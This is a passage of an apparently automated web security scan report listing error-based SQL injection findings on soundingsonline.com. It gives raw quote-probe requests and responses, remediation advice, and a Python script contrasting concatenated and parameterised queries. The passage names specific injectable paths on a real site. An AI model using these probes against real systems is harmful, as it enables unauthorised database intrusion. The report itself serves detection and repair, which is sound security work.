Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:24 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /index.php?option=com_chronocontact''&chronoformname=CGPage HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:25 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.94. http://www.soundingsonline.com/index.php [view parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /index.php

Issue detail

The view parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the view parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared: MySQL reads '' inside a string literal as an escaped quote, so the statement parses again, which shows the input is being spliced into a quoted SQL literal. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. The error text ends in AND cookie_info='', a column unrelated to the view parameter; together with the errors for 1.88 and 1.89, which reproduce the whole request URI, this indicates the request URI as a whole is concatenated into a query the application builds for every request, so the parameters reported for this host are all the same flaw.

The database appears to be MySQL.

Remediation detail

The application should pass request data, including the request URI and cookie values, to the database only through parameterised queries (prepared statements); escaping the view value alone, or hiding the error message, leaves the injection in place. It should also handle errors gracefully and prevent SQL error messages from being returned in responses, since the message discloses the structure of the failing statement.

Request 1

GET /index.php?option=com_content&view=category'&layout=blog&id=98&Itemid=111 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /index.php?option=com_content&view=category''&layout=blog&id=98&Itemid=111 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:56 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.95. http://www.soundingsonline.com/more/digital-publications [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /more/digital-publications

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared: MySQL reads '' inside a string literal as an escaped quote, so the statement parses again, which shows the input is being spliced into a quoted SQL literal. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. As in the other findings for this host, the error text ends in AND cookie_info='', a column no request parameter refers to, so the quote is reaching a query the application appears to build for every request; the injection point is the URL as a whole, not this parameter in particular.

The database appears to be MySQL.

Remediation detail

The application should pass request data, including the request URI and cookie values, to the database only through parameterised queries (prepared statements); escaping individual parameters, or hiding the error message, leaves the injection in place. It should also handle errors gracefully and prevent SQL error messages from being returned in responses, since the message discloses the structure of the failing statement.

Request 1

GET /more/digital-publications?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:04 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /more/digital-publications?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:04 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.96. http://www.soundingsonline.com/more/the-masters-series [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /more/the-masters-series

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared; MySQL reads a doubled single quote inside a string literal as one escaped quote, so the statement parses again, which is what makes the pair of probes a reliable sign that the input lands inside a quoted string. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. The fragment quoted in the error, ' AND cookie_info='', is identical for every path reported on this host, which points to a single statement into which the request URI is concatenated rather than a defect specific to this parameter.

The database appears to be MySQL.

Remediation detail

Suppressing the error message only removes the error oracle; it does not fix the injection. The user-controlled input that reaches this statement (the request URI in these findings) should be passed to the database through parameterised queries rather than string concatenation. In addition, the application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /more/the-masters-series?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:01 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /more/the-masters-series?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:02 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
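As an added example (not part of the scanner's report or of the site's own code), the following Python reproduces the differential check behind the soundingsonline.com findings and shows why the doubled quote clears the error. It parses the two response bodies captured for this finding (copied into the script as constructed constants), assigns the report's confidence level, and then runs a hypothetical statement of the shape the leaked fragment suggests (... AND cookie_info='...') against SQLite, first by string concatenation and then with bound parameters. The table name, column names and the exact statement are assumptions, since the report does not show the application's real SQL; SQLite stands in for MySQL because it ships with Python and lexes '' inside a string literal the same way.

```python
import re
import sqlite3

# Constructed copies of the two response bodies shown for finding 1.96: the
# single-quote probe returns a MySQL syntax error, the double-quote probe
# returns the normal page.
RESPONSE_SINGLE_QUOTE = (
    '<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> '
    '[<font color=000077>You have an error in your SQL syntax; check the manual '
    'that corresponds to your MySQL server version for the right syntax to use '
    "near '' AND cookie_info=''' at line 1</font>"
)
RESPONSE_DOUBLE_QUOTE = (
    '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" '
    '"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">'
)

# MySQL quotes the unparsed remainder of the statement (truncated to roughly
# 80 characters) between "near '" and "' at line N".
MYSQL_SYNTAX_ERROR = re.compile(
    r"right syntax to use near '(?P<frag>.*)' at line (?P<line>\d+)", re.S
)


def mysql_error_fragment(body):
    """Return the SQL fragment a MySQL syntax error leaks, or None if no error."""
    m = MYSQL_SYNTAX_ERROR.search(body)
    return m.group("frag") if m else None


def classify(body_single_quote, body_double_quote):
    """Reproduce the report's confidence levels from the two probe responses.

    Certain: ' breaks the statement and '' does not (MySQL reads '' inside a
             string literal as one escaped quote, so the statement parses again).
    Firm:    ' breaks the statement but the '' control did not clear the error.
    none:    the single quote produced no database error at all.
    """
    if mysql_error_fragment(body_single_quote) is None:
        return "none"
    if mysql_error_fragment(body_double_quote) is None:
        return "Certain"
    return "Firm"


# Hypothetical shape of the affected statement, modelled on the
# "' AND cookie_info=''" fragment the errors expose. The application's real
# SQL, table and column names are not shown in the report.
def vulnerable_lookup(conn, request_uri, cookie_info=""):
    sql = ("SELECT COUNT(*) FROM visits WHERE uri='" + request_uri
           + "' AND cookie_info='" + cookie_info + "'")
    return conn.execute(sql).fetchone()[0]


def safe_lookup(conn, request_uri, cookie_info=""):
    # Bound parameters: the quote is data and never reaches the SQL lexer.
    sql = "SELECT COUNT(*) FROM visits WHERE uri=? AND cookie_info=?"
    return conn.execute(sql, (request_uri, cookie_info)).fetchone()[0]


def probe(lookup, request_uri):
    """Run one lookup against a fresh table; report whether the SQL parsed."""
    conn = sqlite3.connect(":memory:")
    try:
        conn.execute("CREATE TABLE visits (uri TEXT, cookie_info TEXT)")
        # One stored row whose uri contains a literal single quote.
        conn.execute("INSERT INTO visits VALUES (?, ?)", ("/news?1'=1", ""))
        return ("ok", lookup(conn, request_uri))
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))
    finally:
        conn.close()


if __name__ == "__main__":
    print("report confidence:", classify(RESPONSE_SINGLE_QUOTE, RESPONSE_DOUBLE_QUOTE))
    print("leaked fragment:", mysql_error_fragment(RESPONSE_SINGLE_QUOTE))
    for uri in ("/news?1'=1", "/news?1''=1"):
        print(uri, "concatenated:", probe(vulnerable_lookup, uri),
              "parameterised:", probe(safe_lookup, uri))
```

With concatenation the quoted URI fails to parse and the doubled-quote URI succeeds and even matches the stored row, because the database unescapes '' back to a single quote. With bound parameters both requests parse, the quoted URI matches the row and the doubled-quote URI does not, since the input is compared literally and never interpreted as SQL. Hiding the error message alone would only turn the Certain finding into a blind one.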

1.97. http://www.soundingsonline.com/news [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

Suppressing the error message only removes the error oracle; it does not fix the injection. The user-controlled input that reaches this statement (the request URI in these findings) should be passed to the database through parameterised queries rather than string concatenation. In addition, the application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /news?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:58 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /news?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:06 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.98. http://www.soundingsonline.com/news/coastwise [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/coastwise

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

Suppressing the error message only removes the error oracle; it does not fix the injection. The user-controlled input that reaches this statement (the request URI in these findings) should be passed to the database through parameterised queries rather than string concatenation. In addition, the application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /news/coastwise?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:25 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /news/coastwise?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:31 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.99. http://www.soundingsonline.com/news/dispatches [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/dispatches

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

Suppressing the error message only removes the error oracle; it does not fix the injection. The user-controlled input that reaches this statement (the request URI in these findings) should be passed to the database through parameterised queries rather than string concatenation. In addition, the application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /news/dispatches?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:36 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /news/dispatches?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:54 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.100. http://www.soundingsonline.com/news/home-waters [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/home-waters

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

Suppressing the error message only removes the error oracle; it does not fix the injection. The user-controlled input that reaches this statement (the request URI in these findings) should be passed to the database through parameterised queries rather than string concatenation. In addition, the application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /news/home-waters?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:36 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /news/home-waters?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

